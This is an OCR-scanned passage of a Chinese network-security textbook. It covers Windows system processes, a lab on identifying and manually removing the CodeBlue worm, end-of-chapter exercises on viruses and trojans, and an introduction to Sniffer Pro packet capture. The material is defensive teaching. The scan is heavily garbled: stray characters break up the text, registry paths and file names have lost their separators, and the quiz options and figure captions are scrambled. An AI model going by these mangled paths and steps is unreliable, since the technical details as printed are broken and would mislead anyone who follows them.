snmptrap.exe ”接收 由 本 地 或 远程 SNMP 代理 程序 产生 的 陷阱 消息 , 然后 将 消息 传递 到 
运行 在 这 台 计 算 机 上 SNMP 管理 程序 。( 系 统 服 务 ) 

UtilMan.exe ”从 一 个 窗口 中 启动 和 配置 辅助 工具 。( 系 统 服 务 ) 

msiexec.exe ”依据 .MSI 文件 中 包含 的 命令 来 安装 、 修 复 以 及 删除 软件 。( 系 统 服 务 ) 
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实 训 三 ”手动 清除 CodeBlue 


1. 实验 目的 


(1) 掌握 感染 CodeBlue 具有 的 特征 。 
(2) 掌握 手动 清除 CodeBlue 的 方法 。 


2. 实验 内 容 


(1) 观察 感染 CodeBlue 具有 的 特征 。 
(2) 手动 清除 CodeBlue 的 方法 。 


3. 实验 步骤 


感染 CodeBlue 会 具有 以 下 特征 。 

(1) 打开 资源 管理 器 , 到 C 盘 根 目 录 “c:”, 看 一 看 是 否 存在 c:svchostexe, c:httpext.dll， 
由 于 这 两 个 文件 带 有 隐藏 属性 ， 因 此 需要 到 资源 浏览 器 的 “工具 ”菜单 中 “文件 夹 选 项 ” 
的 “查看 ”页 ， 将 “显示 所 有 文件 和 文件 夹 ” 选 项 选中 ， 才 能 确定 。 

(2) 到 开始 菜单 的 “运行 ”项 ， 使 用 regedit.exe 注册 表 编辑 器 ， 到 “HKEY_LOCAL_ 
MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun ”看 一 看 是 否 存在 “Domain 
Manager” 。 

(3) 打开 任务 管理 器 ， 到 “查看 ”菜单 中 的 “选择 列 ”， 将 其 中 “线程 计数 ”选项 选 
中 ， 确 定 回 到 “进程 ”页 ， 看 一 看 svchostexe 所 用 的 线程 数 是 否 超过 100，CodeBlue 的 线 
程 数 一 般 会 是 104，105 左右 。 

(4) 打开 资源 管理 器 ， 到 “C:inetpubscripts” 目 录 ， 看 一 看 是 否 有 httpext.dll。 

通过 以 上 的 特征 ， 可 以 很 方便 识别 CodeBlue 的 存在 ， 由 于 CodeBlue 蠕虫 非常 狐 独 ， 
为 了 降低 大 家 的 警觉 性 , 程序 文件 的 名 字 采 用 了 系统 中 已 经 有 的 文件 svchostexe(C:winntsystem32) 
和 httpext.dll(C:winntsystem32inetsrv)， 如 果 用 户 不 小 心 误 删除 ， 可 以 到 相同 版 本 的 机 器 上 
复制 相应 文件 ， 或 者 重新 安装 Windows NT/2000， 如 果 是 Windows 2000 以 上 版 本 到 
c:winntsystem32dllcache 下 复制 就 可 以 。 

手动 清除 CodeBlue 的 方法 如 下 。 

(1) 请 先 关 掉 IS 服务 ， 避 免 在 此 过 程 中 再 度 受到 网 上 的 漏洞 攻击 。 

(2) 启动 进程 管理 器 ， 打 开 线程 浏览 ， 然 后 查看 名 称 为 svchostexe 的 进程 ， 通 常 系统 
自己 会 有 两 个 ， 而 CodeBlue 的 执行 进程 也 是 这 个 名 字 。 系 统 的 与 CodeBlue 的 进程 最 明显 
的 区 别 在 于 CodeBlue 的 进程 具有 相当 多 的 线程 ,通常 CodeBlue 的 svchost.exe 进程 含有 100 
个 以 上 的 线程 。 

(3) 一 个 一 个 关 掉 这 些 CodeBlue 的 svchostexe 进程 。 

(4) 删除 C: 目 录 下 的 svchostexe 文件 和 httpext.dll 文件 , 注意 CodeBlue 的 这 两 个 文件 
是 具有 隐 含 、 系 统 属性 的 ， 需 要 打开 查看 所 有 文件 选项 。 

(5) 删除 C:inetpubscripts 目录 下 的 大 小 为 46587 或 者 47099 的 httpext.dll 文件 。 

(6) 打开 注册 表 编 辑 器 ， 找 到 HKEY_LOCAL MACHINESoftwareMicrosoftWindows 


li， ” 务 4 蕊 


CurrentVersionRun， 人 删除 其 中 以 Domain Manager 命名 的 键 值 。 


于 和 介 轴 帝 蕊 与 大 号 


注意 : 为 避免 再 度 被 CodeBlue 感染 ， 建 议 安装 微软 提供 的 Service Pack。 


本 章 习 题 
一 、 选 择 题 
1. 计算 机 病毒 从 本 质 上 来 说 是 ( % 
A. 蛋白 质 B. 程序 代码 C. 应 用 程序 


2. 特洛伊 木马 从 本 质 上 来 说 是 ( 天 
A. 黑客 入 侵 计算 机 的 特殊 工具 
B. 程序 代码 
C. 硬件 设备 

3. ”计算 机 病毒 先后 经 历 了 ( ”) 代 的 发 展 。 
A. 一 代 B. 二 代 

4. ”计算 机 病毒 的 主要 传播 途径 有 ( 。”)。 
A. 计算 机 不 可 移动 的 硬件 设备 
B. 可 移动 的 储存 设备 
C. 计算 机 网 络 
D. 点 对 点 通信 系统 和 无 线 网 络 

5. 病毒 程序 一 旦 被 激活 ， 就 会 马上 ( 。 )。 
A. 复制 B. 繁殖 

6. 蜂 虫 是 由 以 下 (  ) 部 分 构成 的 。 
A. 传播 模块 B. 隐藏 模块 

7. 蠕虫 入 侵 是 利用 了 主机 的 ( 。 ”)。 
A. 漏洞 B. 弱点 

8. 木马 入 侵 主机 的 主要 目的 是 为 了 (  )。 
A. 维护 系统 B. 窃取 机 密 


二 、 填 空 题 


1. 计算 机 病毒 的 特征 为 
2. 计算 机 病毒 的 传播 途径 一 般 有 . 
3. 文件 型 病毒 将 自己 依附 在 .com 和 .exe 等 


4 是 一 种 基于 远程 控制 的 黑客 工具 ， 它 通常 寄生 于 用 户 的 计算 机 系统 


中 ， 盗 窃 用 户 信息 ， 并 通过 网 络 发 送 给 黑客 。 


5: 是 一 种 可 以 自我 复制 的 完全 独立 的 程序 , 它 的 传播 不 需要 借助 被 感染 
主机 的 其 他 程序 。 它 可 以 自动 创建 与 其 功能 完全 相同 的 副本 ， 并 在 没 人 干涉 的 情况 下 自动 


运行 。 


请 类 
C. 目的 模块 
C. 设备 


C. 破坏 系统 


文件 上 。 


D. 四 代 


三 种 。 
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三 、 简 答题 
试 述 计算 机 病毒 的 发 展 阶段 。 
计算 机 病毒 有 哪些 主要 特点 ? 
计算 机 病毒 的 主要 传播 途径 有 哪些 ? 
目前 预防 病毒 工具 中 采用 的 技术 主要 有 哪些 ? 
目前 广泛 使 用 的 计算 机 病毒 检测 技术 有 哪些 ? 
蠕虫 和 病毒 有 哪些 相同 点 和 不 同 点 ? 
如 何 防 范 网 络 病 毒 ? 
比较 计算 机 病毒 感染 COM 文件 和 EXE 文件 方式 的 异同 点 。 
如 何 进行 宏 病毒 的 预防 与 清除 。 
、 描 述 脚本 病毒 的 特点 、 预 防 与 清除 。 
11. 描述 网 络 蠕虫 病毒 传染 与 传播 过 程 。 
12. 逻辑 炸弹 、 后 门 、 病 毒 、 木 马 会 给 用 户 的 计算 机 带 来 哪些 危害 ? 如 何 尽量 避免 遭 
受 程 序 攻击 ? 
13. 为 什么 后 来 的 木马 制造 者 制造 出 反弹 式 木 马 ? 反弹 式 木马 的 工作 原理 是 什么 ? 试 
画 出 反弹 式 木 马 的 工作 流程 图 。 
14.， 试 说 明 远 辑 炸弹 与 病毒 的 相同 点 与 不 同 点 。 
15. 试 画 出 模拟 Morris 蠕虫 病毒 主体 程序 代码 的 工作 流程 图 。 
16. 利用 计算 机 系统 的 漏洞 是 制作 后 门 的 常用 方法 ， 你 了 解 你 现在 计算 机 的 操作 系统 
的 漏洞 有 哪些 ? 
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第 5 章 安全 防护 与 入 侵 检测 


【本 章 要 点 】 


本 章 主 要 从 网 络 安全 的 防护 和 入 侵 检测 入 手 ， 详 细 介 绍 嗅 探 软件 Sniffer 的 功能 、 对 报 
文 的 捕获 与 解析 及 高 级 应 用 。 在 入 侵 检测 系统 中 ， 介 绍 入 侵 检测 系统 的 原理 、 类 型 和 入 侵 
防护 技术 及 蜜 馆 、 密 网 和 密 场 等 知识 。 


5.1 Sniffer Pro 网 络 管理 与 监视 


Sniffer 可 以 翻译 为 嗅 探 器 ， 是 一 种 基于 被 动 侦 听 原理 的 网 络 分 析 方式 。 使 用 这 种 技术 
方式 ， 可 以 监视 网 络 的 状态 、 数 据 流动 情况 以 及 网 络 上 传输 的 信息 。 当 信息 以 明文 的 形式 
在 网 络 上 传输 时 ， 便 可 以 使 用 网 络 监听 的 方式 来 进行 攻击 。 将 网 络 接口 设置 在 监听 模式 ， 
便 可 以 将 网 上 传输 的 源源 不 断 的 信息 截获 。 Sniffer 技术 常常 被 黑客 们 用 来 截获 用 户 的 口令 。 
但 实际 上 ，Sniffer 技术 被 广泛 地 应 用 于 网 络 故障 诊断 、 协 议 分 析 、 应 用 性 能 分 析 和 网 络 安 
全 保障 等 各 个 领域 。 

Sniffer 分 为 软件 和 硬件 两 种 , 软件 的 Sniffer 有 Sniffer Pro、Network Monitor、 PacketBone 
等 ， 其 优点 是 易于 安装 部 署 ， 易 于 学 习 使 用 ， 同 时 也 易于 交流 ， 缺点 是 无 法 抓 取 网 络 上 所 
有 的 传输 ， 某 些 情况 下 也 就 无 法 真正 了 解 网 络 的 故障 和 运行 情况 。 硬 件 的 Sniffer 通常 称 为 
协议 分 析 仪 ， 一 般 都 是 商业 性 的 ， 价 格 也 比较 昂贵 ， 但 具备 支持 各 类 扩展 的 链 路 捕获 能 力 
以 及 高 性 能 的 数据 实时 捕获 分 析 的 功能 。 

基于 以 太 网 络 嗅 探 的 Sniffer 只 能 抓 取 一 个 物理 网 段 内 的 包 ， 也 就 是 说 ， 监 听 者 和 监听 
的 目标 中 间 不 能 有 路 由 或 其 他 屏蔽 广播 包 的 设备 ， 这 一 点 很 重要 。 所 以 ， 对 一 般 拨号 上 网 
的 用 户 来 说 ， 是 不 可 能 利用 Sniffer 来 窃听 到 其 他 人 的 通信 内 容 的 。 

下 面 介绍 Sniffer 的 原理 。 


1. 网 络 技术 与 设备 简介 


在 讲述 Sniffer 的 概念 之 前 ， 首 先 需要 讲述 局 域 网 设备 的 一 些 基本 概念 。 

数据 在 网 络 上 是 以 很 小 的 称 为 帧 Frame) 的 单位 传输 的 ， 帧 由 几 部 分 组 成 ， 不 同 的 部 分 
执行 不 同 的 功能 。 帧 通过 特定 的 称 为 网 络 驱动 程序 的 软件 进行 成 型 ， 然 后 通过 网 卡 发 送 到 
网 络 上 ， 通 过 网 络 到 达 它 们 的 目的 机 器 ， 在 目的 机 器 的 一 端 执 行 相反 的 过 程 。 接 收 端 机 器 
的 以 太 网 卡 捕获 到 这 些 帧 ， 并 告诉 操作 系统 帧 已 到 达 ， 然 后 对 其 进行 存储 。 在 这 个 传输 和 
接收 的 过 程 中 ， 嗅 探 器 也 会 带 来 安全 方面 的 问题 。 

每 一 个 在 局 域 网 LAN) 上 的 工作 站 都 有 其 硬件 地 址 ， 这 些 地 址 唯一 地 表示 了 网 络 上 的 
机 器 (这 一 点 与 Internet 地 址 系统 比较 相似 )。 当 用 户 发 送 一 个 数据 包 时 ， 这 些 数据 包 就 会 发 
送 到 LAN 上 所 有 可 用 的 机 器 。 

如 果 使 用 Hub 即 基于 共享 网 络 的 情况 下 ， 网 络 上 所 有 的 机 器 都 可 以 “ 听 ” 到 通过 的 流 
量 ， 但 对 不 属于 自己 的 数据 包 则 不 予 响应 ( 换 名 话说， 工作 站 A 不 会 捕获 属于 工作 站 B 的 
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数据 ， 而 是 简单 地 忽略 这 些 数据 )。 如 果 某 个 工作 站 的 网 络 接口 处 于 混杂 模式 (关于 混杂 模 
式 的 概念 会 在 后 面 解释 )， 那 么 它 就 可 以 捕获 网 络 上 所 有 的 数据 包 和 帧 。 

但 是 现代 网 络 常常 采用 交换 机 作为 网 络 连接 设备 枢纽 ， 在 通常 情况 下 ， 交 换 机 不 会 让 
网 络 中 的 每 一 台 主 机 侦 听 到 其 他 主机 的 通信 ,因此 Sniffer 技术 在 这 时 必须 与 网 络 端口 镜像 
技术 进行 配合 。 而 衍生 的 安全 技术 则 通过 ARP 欺骗 来 变相 达到 交换 网 络 中 的 侦 听 。 

2. 网 络 监听 原理 

Sniffer 程序 是 一 种 利用 以 太 网 的 特性 把 网 络 适 配 卡 NIC， 一 般 为 以 太 网 卡 ) 置 为 杂乱 
(promiscuous) 模 式 状态 的 工具 ， 一 旦 网 卡 设置 为 这 种 模式 ， 它 就 能 接收 在 网 络 上 传输 的 每 
一 个 信息 包 。 

普通 的 情况 下 ,网 卡 只 接收 和 自己 的 地 址 有 关 的 信息 包 ， 即 传输 到 本 地 主机 的 信息 包 。 
要 使 Sniffer 能 接收 并 处 理 这 种 方式 的 信息 ， 系 统 需 要 支持 BPF。 但 一 般 情 况 下 ， 网 络 硬件 
和 “TCP/IP 堆栈 不 支持 接收 或 者 发 送 与 本 地 计算 机 无 关 的 数据 包 ， 所 以 ， 为 了 绕 过 标准 的 
TCP/IP 堆栈 , 网 卡 就 必须 设置 为 我 们 刚 开 始 讲 的 混杂 模式 。 一 般 情 况 下 ,要 激活 这 种 方式 ， 
内 核 必须 支持 这 种 伪 设 备 Bpfilter， 而 且 需 要 root 权限 来 运行 这 种 程序 ， 所 以 Sniffer 需要 
root 身份 安装 ， 如 果 只 是 以 本 地 用 户 的 身份 进入 系统 ， 则 不 可 能 嗅 探 到 root 的 密码 ， 也 就 
不 能 运行 Sniffer。 

也 有 基于 无 线 网 络 、 广 域 网 络 IDDN,，FR) 甚 至 光 网 络 (POS、Fiber Channel) 的 监听 技术 ， 
它 与 以 太 网 络 上 的 捕获 概念 略微 不 同 ， 其 中 通常 会 引入 TAP (测试 介入 点 ) 这 类 的 硬件 设备 
进行 数据 采集 。 


5.1.1 Sniffer Pro 的 功能 


Sniffer 网 络 分 析 仪 是 一 个 网 络 故障 、 性 能 和 安全 管理 的 有 力 工 具 ， 它 能 够 自动 地 帮助 
网 络 专业 人 员 维护 网 络 、 查 找 故 障 ， 极 大 地 简化 了 发 现 和 解决 网 络 问题 的 过 程 ， 广 泛 适 用 
于 Ethemet、 Fast Ethernet、 Token Ring、Switched LANs、FDDI、X.25、DDN 、Frame Relay、 
ISDN、ATM 和 Gigabits 等 网 络 。 


1. Sniffer 产品 的 基本 功能 


1) ”网 络 安全 的 保障 与 维护 

(1) 对 异常 的 网 络 攻击 的 实时 发 现 与 告警 ; 
(2) 对 高 速 网 络 的 捕获 与 侦 听 ; 

(3) 全 面 分 析 与 解码 网 络 传输 的 内 容 。 

2) 面向 网 络 链 路 运行 情况 的 监测 

(1) 各 种 网 络 链 路 的 运行 情况 ; 

(2) 各 种 网 络 链 路 的 流量 及 阻塞 情况 ; 
(3) 网 上 各 种 协议 的 使 用 情况 ; 

(4) 网 络 协议 自动 发 现 ; 

(5) 网 络 故障 监测 。 
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3) 面向 网 络 上 应 用 情况 的 监测 

(1) 任意 网 段 应 用 流量 、 流 向 ; 

(2) 任意 服务 器 应 用 流量 、 流 向 ; 

(3) 任意 工作 站 应 用 流量 、 流 向 

(4) 典型 应 用 程序 响应 时 间 ; 

(5) 不 同 网 络 协议 所 占 带宽 比例 ; 

(6) 不 同 应 用 流量 、 流 向 的 分 布 情况 及 拓扑 结构 。 

人 ”强大 的 协议 解码 能 力 ， 用 于 对 网 络 流量 的 深入 解析 

(1) 对 各 种 现 有 网 络 协议 进行 解码 ; 

(2) 对 各 种 应 用 层 协 议 进行 解码 ; 

(3) Sniffer 协议 开发 包 (PDK) 可 以 让 用 户 简 单方 便 地 增加 用 户 自 定义 的 协议 。 
5) ”网 络 管理 、 故 障 报警 及 恢复 

运用 强大 的 专家 分 析 系 统 帮助 维护 人 员 在 最 短 时 间 内 排除 网 络 故障 。 


2. 实时 监控 统计 和 告警 功能 


根据 用 户 习惯 ，Sniffer 可 提供 实时 数据 或 图 表 方式 显示 统计 结果 ， 统 计 内 容 如 下 。 

(1) 网 络 统计 : 如 当前 和 平均 网 络 利用 率 、 总 的 和 当前 的 帧 数 及 字 节 数 、 总 站 数 和 激 
活 的 站 数 、 协 议 类 型 、 当 前 和 总 的 平均 帧 长 等 。 

(2) 协议 统计 如 协议 的 网 络 利 用 率 、 协 议 的 个 数 、 协 议 的 字 节 数 以 及 每 种 协议 中 各 
种 不 同类 型 的 帧 的 统计 等 。 

(3) 差错 统计 : 如 错误 的 CRC 校 验 数 、 发 生 的 碰撞 数 、 错 误 帧 数 等 。 

(4) 站 统计 : 如 接收 和 发 送 的 帧 数 、 开 始 时 间 、 停 止 时 间 、 消 耗 时 间 、 站 状态 等 。 最 
多 可 统计 1 024 个 站 。 

(5) 帧 长 统计 : 如 某 一 帧 长 的 帧 所 占 百分比 ， 某 一 帧 长 的 帧 数 等 。 

当 某 些 指标 超过 规定 的 阔 值 时 ，Sniffer 可 以 自动 显示 或 采用 有 声 形 式 的 告警 。 

Sniffer 可 根据 网 络 管理 者 的 要 求 ， 自 动 将 统计 结果 生成 多 种 统计 报告 格式 ， 并 可 存盘 
或 打印 输出 。 

3. Sniffer 实时 专家 分 析 系 统 


高 度 复杂 的 网 络 协议 分 析 工 具 能 够 监视 并 捕获 所 有 网 络 上 的 信息 数据 包 ， 并 同时 建立 
一 个 特有 网 络 环境 下 的 目标 知识 库 。 智 能 的 专家 技术 扫描 这 些 信息 以 检测 网 络 异常 现象 ， 
并 自动 对 每 种 异常 现象 进行 归 类 。 所 有 异常 现象 被 归 为 两 类 : 一 类 是 symptom( 故 障 征兆 提 
示 ， 非 关键 事件 例如 单一 文件 的 再 传送 )， 另 一 类 是 diagnosis( 已 发 现 故障 的 诊断 ， 重 复出 
现 的 事件 或 要 求 立 刻 采 取 行动 的 致命 错误 )。 经 过 问题 分 离 、 分 析 且 归 类 后 ，Sniffer 将 实时 
地 自动 发 出 一 份 警告 ， 对 问题 进行 解释 并 提出 相应 的 建议 解决 方案 。 

Sniffer 与 其 他 网 络 协议 分 析 仪 最 大 的 差别 在 于 它 的 人 工 智能 专家 系统 (Expert System) 。 
简单 地 说 ，Sniffer 能 自动 实时 监视 网 络 、 捕 捉 数 据 、 识 别 网 络 配置 、 自 动 发 现 网 络 故障 并 
进行 告警 ， 它 能 指出 : 

(1) 网 络 故障 发 生 的 位 置 ， 以 及 出 现在 OSI 第 几 层 。 

(2) 网 络 故障 的 性 质 ， 产 生 故 障 的 可 能 原因 以 及 为 解决 故障 建议 采取 的 行动 。 
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Sniffer 还 提供 了 专家 配制 功能 , 用 户 可 以 自己 设 定 专家 系统 判断 故障 发 生 的 触发 条 件 。 
有 了 专家 系统 ， 就 无 须知 道 哪些 数据 包 会 造成 网 络 问 题 ， 也 不 必 熟 悉 网 络 协议 ， 更 不 
用 去 了 解 这 些 数 据 包 的 内 容 ， 便 能 轻松 解决 问题 。 


5.1.2 ”Sniffer Pro 的 设置 窗口 


在 进行 流量 捕获 之 前 首先 选择 网 络 适配器 ， 确 定 从 计算 机 的 哪个 网 络 适配器 上 接收 数 
据 ， 如 图 5-1 所 示 。 


savet stines | 


Select settines for nonitoriag: 


5-1 Sniffer Pro 的 网 络 适配器 选择 窗口 
选择 网 络 适 配器 后 才能 正常 工作 。 本 文 将 对 报 文 的 捕获 及 网 络 性 能 监视 等 功能 进行 详 
细 的 介绍 。 
5.1.3 Sniffer Pro 报 文 的 捕获 与 解析 


捕获 功能 与 存储 网 络 通信 量 测量 及 计算 数据 的 监视 功能 不 同 ， 它 从 网 络 中 采集 数据 包 
并 将 其 存储 在 捕获 缓冲 区 中 。 在 捕获 过 程 中 ,专家 系统 将 分 析 数 据 包 并 实时 显示 分 析 结 果 。 
在 停止 捕获 后 ， 可 以 通过 软件 的 显示 功能 对 捕获 缓冲 区 中 的 数据 包 进 行 解 码 并 加 以 显示 。 


1. 捕获 面板 
报 文 捕获 功能 可 以 在 报 文 捕获 面板 中 完成 ， 图 5-2 显示 的 是 处 于 开始 状态 的 捕获 面板 。 
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5-2 Sniffer Pro 的 捕获 条 件 设置 面板 


2. 基本 捕获 条 件 
基本 的 捕获 条 件 有 以 下 两 种 。 
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(1) 链 路 层 捕获 , 按 源 MAC 和 目的 MAC 地 址 进行 捕获 , 输入 方式 为 十 六 进 制 连续 输 
入 ， 如 00E0FC123456。 

(2) 人 P 层 捕获 ， 按 源 全 和 目的 他 进行 捕获 。 输入 方式 为 点 间隔 方式 ， 如: 10.107.1.1。 
如 果 选 择 人 P 层 捕获 条 件 ， 则 ARP 等 报 文 将 被 过 滤 掉 ， 如 图 5-3 所 示 。 


| 
Smmary Mdress | Dats Fattera| Advaneed| paffer| Setings For 
airess Enorn Address: Drsgatle) Da 


图 5-3 Sniffer Pro 的 基本 捕获 条 件 设置 面板 


3. 高 级 捕获 条 件 
在 Advanced 选项 卡 中 ， 可 以 编辑 协议 捕获 条 件 ， 如 图 5-4 所 示 。 


Packet Size 
A 
All sires 


5-4 Sniffer Pro 的 高 级 捕获 条 件 设 置 面板 


(1) 在 协议 选择 树 中 ， 可 以 选择 需要 捕获 的 协议 条 件 ， 如 果 什么 都 不 选 ， 则 表示 忽略 
该 条 件 ， 捕 获 所 有 协议 。 

(2) 在 捕获 帧 长 度 条 件 的 下 拉 列 表 框 中 ， 可 以 捕获 等 于 、 小 于 、 大 于 某 个 值 的 报 文 。 

G3) 在 错误 帧 是 否 捕获 列表 框 中 ， 可 以 选择 当 网 络 上 有 某 种 错误 时 是 否 捕获 。 

(4) 单 击 保存 过 滤 规 则 条 件 按钮 Profiles， 可 以 将 当前 设置 的 过 滤 规则 进行 保存 ， 在 捕 
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获 主 面板 中 ， 可 以 选择 保存 的 捕获 条 件 。 
4. 任意 捕获 条 件 
在 Data Pattem 选项 卡 中 ， 可 以 编辑 任意 捕获 条 件 ， 如 图 5-5 所 示 。 


Define Filter a | 
Settings For 


Madd AND/OR | Tosale Am/og| oT Add NOT 
Aad Pattern | Edit Pattern Deets Evaluate 


让 


图 5-5 Sniffer Pro 的 任意 捕获 条 件 设置 面板 


用 这 种 方法 可 以 实现 复杂 的 报 文 过 滤 ， 但 很 多 时 候 得 不 偿 失 ， 因 为 截获 的 报 文 不 多 ， 


不 如 自己 看 更 快 。 
5. 捕获 过 程 报 文 统计 


在 捕获 过 程 中 可 以 通过 查看 图 5-6 所 示 的 面板 ， 查 看 捕获 报 文 的 数量 和 缓冲 区 的 利 


用 率 。 


捕获 报 文 的 数 
据 缓冲 大 小 


图 5-6 Sniffer Pro 的 捕获 条 件 报 文 面板 


6. 捕获 报 文 查看 


Sniffer 软件 提供 了 强大 的 分 析 能 力 和 解码 功能 。 对 于 捕获 的 报 文 提供 了 一 个 Expert 专 
家 分 析 系 统 进 行 分 析 ， 还 有 解码 选项 及 图 形 和 表格 的 统计 信息 ， 如 图 5-7 所 示 。 
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图 5-7 Sniffer Pro 的 报 文 查看 面板 


专家 分 析 系统 提供 了 一 个 分 析 平 台 ， 对 网 络 上 的 流量 进行 了 一 些 分 析 ， 对 于 分 析出 的 
诊断 结果 可 以 查看 在 线 帮助 获得 。 

图 5-8 显示 出 在 网 络 中 WINS 查询 失败 的 次 数 及 TCP 重 传 的 次 数 统计 等 内 容 ， 可 以 方 
便 了 解 网 络 中 高 层 协议 出 现 故障 的 可 能 点 。 

对 于 某 项 统计 分 析 可 以 通过 用 鼠标 双击 此 条 记录 来 查看 详细 统计 信息 ， 且 对 于 每 一 项 
都 可 以 通过 查看 帮助 来 了 解 其 产生 的 原因 ， 双 击 图 5-8 所 示 的 记录 可 以 查看 详细 信息 。 
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7. 捕获 的 报 文 

解码 功能 是 按照 过 滤器 设置 的 过 滤 规 则 进行 数据 的 捕获 或 显示 。 在 菜单 上 的 位 置 分 别 
为 Capture 一 Define Filter 和 Display 一 Define Filter。 

过 滤器 可 以 根据 物理 地 址 或 他 地 址 和 协议 进行 组 合 筛选 。 

8. 解码 分 析 


如 图 5-9 所 示 是 对 捕获 报 文 进行 解码 的 显示 ， 通 常 分 为 三 部 分 ， 目 前 大 部 分 此 类 软件 
都 采用 这 种 结构 显示 。 对 于 解码 主要 要 求 分 析 人 员 对 协议 比较 熟悉 ， 这 样 才能 看 懂 解 析出 
来 的 报 文 。 使 用 该 软件 是 很 简单 的 事情 ， 要 能 够 利用 软件 解码 分 析 来 解决 问题 ， 关 键 是 要 
对 各 种 层次 的 协议 了 解 透彻 。 工 具 软 件 只 是 提供 一 个 辅助 的 手段 。 因 涉及 的 内 容 太 多 ， 这 
里 不 对 协议 进行 过 多 讲解 ， 请 参阅 其 他 相关 资料 。 

对 于 MAC 地 址 ，Sniffer 软件 进行 了 头 部 的 替换 ， 如 00e0fc 开头 的 就 替换 成 Huawei， 
这 样 有 利于 了 解 网 络 上 各 种 相关 设备 的 制造 厂商 信息 。 


[Snif2. cap: Decode, 1/3803 Ethernet EGR 


W27247 
[10.11.128.157] 


= FARP: ——— ARP/RARP frame -一 一 一 


(3 ARP 
LY ARP: Hardware type = 1 (10Mb Ethernet) 到 | 
已 1 type = 0800 iIP) 


LY ARP: Length of hardware address = 6 byte 
[A ARP, Tanath of nrotnonl addreee = 4 hvtan 


00000000: 00 10 a4 ?7b fe 84 00 e0 fc 00 11 05 0 
Dede 足 叶 中 04 00 01 a e0 fc 00 11 05 dl 
00000 : 00.00.00.0a 0b 69 3s 00 00 0% 
B0000030: 00 00 00 00 00 00 00 00 3c dc 41 


1f 
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9. 统计 分 析 


Sniffer Pro 对 于 Matrix、Host Table、Portocol Dist、Statistics 等 提供 了 丰富 的 按照 地 址 、 
协议 等 内 容 做 的 丰富 的 组 合 统计 ， 比 较 简 单 ， 可 以 通过 操作 很 快 掌握 。 这 里 就 不 再 详细 介 
绍 了 。 


5.1.4 ”Sniffer Pro 的 高 级 应 用 


一 一 潼 洲 落 粕 半 车 溢 民 谷村 出 到 沼 卫 


| 使 用 数据 包 生 成 器 在 网 络 中 发 送 测试 数据 包 ， 可 以 重 现 要 排除 的 网 络 故障 ， 验 证 对 网 
| 络 设备 或 应 用 程序 的 修复 方法 是 否 正确 和 生成 各 级 网 络 通信 量 负 载 ， 模 拟 实际 的 网 络 情况 


川 T1 1 沉 5 蓝 魏 全 所 芒 与 入 乱 艇 沁 


并 对 设备 或 应 用 程序 进行 测试 。 

通过 “数据 包 生 成 器 ”， 可 以 发 送 自己 创建 或 从 网 络 捕获 的 单个 数据 包 ， 也 可 以 发 送 
捕获 缓冲 区 或 捕获 文件 的 全 部 内 容 。 

可 以 一 次 、 连 续 或 以 指定 次 数 发 送 数据 包 、 捕 获 缓冲 区 或 者 捕获 文件 。 当 发 送 多 个 数 
据 包 或 连续 发 送 一 个 数据 包 时 ， 可 以 指定 每 个 数据 包 之 间 的 时 延 (以 毫秒 或 希望 所 发 送 数据 
包 达 到 的 线路 利用 率 百 分 比 表 示 )。 

“数据 包 生 成 器 ”有 两 个 视图 。 动 画 视 图 显示 了 数据 包 正 在 发 送 的 时 刻 ， 视 图 详细 显 
示 了 数据 包 传输 的 过 程 。 

1. 发 送 单个 数据 包 

在 发 送 数据 包 之 前 ， 必 须 准 备 好 要 发 送 的 消息 ， 可 以 创建 数据 包 、 使 用 已 捕获 数据 包 
或 者 使 用 修改 后 的 已 捕获 数据 包 。 

(1) 要 创建 新 数据 包 ， 应 单 击 “ 数 据 包 生成 器 ”中 的 副 按 钮 打开 “发 送 新 帧 ”对 话 框 ， 
然后 在 配置 选项 卡 中 直接 编辑 十 六 进 制 的 显示 内 容 。 

(2) 要 选择 或 编辑 现 有 的 (捕获 的 ) 数 据 包 ， 必 须 先 从 解码 显示 的 “摘要 ” 窗 格 中 选择 
该 数据 包 。 然 后 ， 单 击 “ 数 据 包 生成 器 ”中 的 芋 按 钮 ， 打 开 “ 发 送 当前 帧 ”对 话 框 ， 在 配 
置 选项 卡 中 编辑 十 六 进 制 的 显示 内 容 。 通 过 选择 对 话 框 中 的 选项 ， 可 以 控制 发 送 数据 包 的 
方式 ， 如 图 5-10 所 示 。 


将 数据 包 大 小 设置 r 要 达到 最 大 的 传输 速率 ， 请 将 时 延 设 为 
为 适合 的 协议 值 ] 0 毫秒 (对 于 延迟 ) 或 者 100% (对 于 
线路 利用 率 ) 


选中 “连续 ” 单 选 
钮 可 重复 发 送 数 据 
指定 发 送 

数据 包 的 

次 数 


输入 要 更 改 的 值 、 
编辑 数据 包 


单 击 “确定 ”按钮 发 送 数据 包 = 


图 5-10 Sniffer Pro 的 发 送 数 据 包 面 板 
2. 发 送 捕获 缓冲 区 或 文件 
要 发 送 当前 的 捕获 缓冲 区 或 捕获 文件 ， 必 须 先 显示 其 内 容 。 要 显示 当前 缓冲 区 ， 应 选 
择 捕获 菜单 中 的 “显示 ”命令 。 要 显示 捕获 文件 ， 应 选择 文件 菜单 中 的 “打开 ”命令 。 然 
后 ， 在 “数据 包 生 成 器 ”窗口 中 单 击 园 按 钮 。 “发送 当前 缓冲 区 ”对 话 框 将 显示 缓冲 区 / 
文件 内 容 的 有 关 信 息 ， 人 允许 控 制 发 送 数据 包 的 方式 ， 如 图 5-11 所 示 。 


© 
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选中 “连续 " 单 选 按 铝 ee 
可 重复 发 送 经 区/ 一 一 一 一 。 15 个 所作 


文件 内 容 

Le 

6 三 一 次 
指定 发 送 级 冲 区 / EF 
文件 内 容 的 次 数 


单 击 “确定 ”按钮 可 发 送 


缓冲 区 /文件 内 容 


图 5-11 Sniffer Pro 的 发 送 数据 包 缓冲 区 面板 


5.1.5 _ Sniffer Pro 的 工具 使 用 


Sniffer Pro 提供 了 一 组 常用 工具 , 可 用 于 标识 和 排除 人 P 网 络 故障 。 这些 工具 包括 Ping、 
路 由 跟踪 、DNS 查找 、Finger 和 Whois， 可 以 通过 工具 菜单 访问 它们 。 

1. Ping 命令 的 使 用 

Ping 命令 可 用 来 识别 网 络 的 瑟 主机 节点 是 否 可 用 。Ping 命令 使 用 ICMP 协议 的 强 
制 性 “ 回 送 请 求 ” 数 据 包 ， 使 制定 的 主机 或 网 关 发 出 “ICMP 回 送 响应 ”。 

(1) 如 果 主 机 发 出 响应 ，Ping 命令 将 显示 发 送 和 接收 的 字 节 数 、 响 应 时 间 以 及 
TTL( 生 存 时 间 )。 

